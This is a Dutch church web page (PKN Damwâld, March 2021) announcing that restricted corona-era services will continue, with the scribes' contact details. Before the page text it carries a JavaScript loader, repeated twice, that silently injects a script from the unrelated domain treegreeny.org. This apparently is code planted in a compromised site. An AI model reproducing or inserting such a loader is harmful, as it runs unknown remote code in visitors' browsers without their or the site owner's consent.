;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Update corononamaatregelen - PKN Damwâld

Update corononamaatregelen

Gepubliceerd op: vrijdag 5 maart 2021

De landelijke PKN heeft het advies gegeven dat het weer mogelijk is om met 30 personen samen te kunnen komen, met daarnaast wel de opmerking om te kijken naar de eigen omstandigheden. Het gezamenlijk beleid om kerkdiensten te vieren met gemeenteleden is bij ons steeds gebaseerd geweest op adviezen van het RIVM en de regeringsbesluiten. Er is nog steeds een lockdown, bezoekbeperking en de avondklok is ook nog steeds van kracht. Ook de huidige besmettingen binnen Damwoude – ieder kent ze in eigen kring – en de dreiging van de derde golf geven ons ook zorgen. Er is daarom door beide kerkenraden besloten om voorlopig op de huidige wijze door te gaan.

Houdt u vooral de Klok en Ús Tsjerkenijs in de gaten voor de laatste informatie. Mocht u uw e-mail nog niet hebben doorgegeven om deze digitaal te ontvangen: doet u dit vooral alsnog! Voor Gereformeerd bij janrreitsma@gmail.com en voor Hervormd bij hervormdambv@hotmail.com.

We wensen u allemaal Gods’ zegen toe in deze onrustige tijd, we mogen er zeker van zijn dat God voor Zijn Huis zorgt.

Als u vragen heeft: bel of mail gerust naar de scriba:
Geralda Teertstra
Tel: 0511-424766 of : hervormdambv@hotmail.com
of
Jan Reitsma
Tel: 0511-421542 of: janrreitsma@gmail.com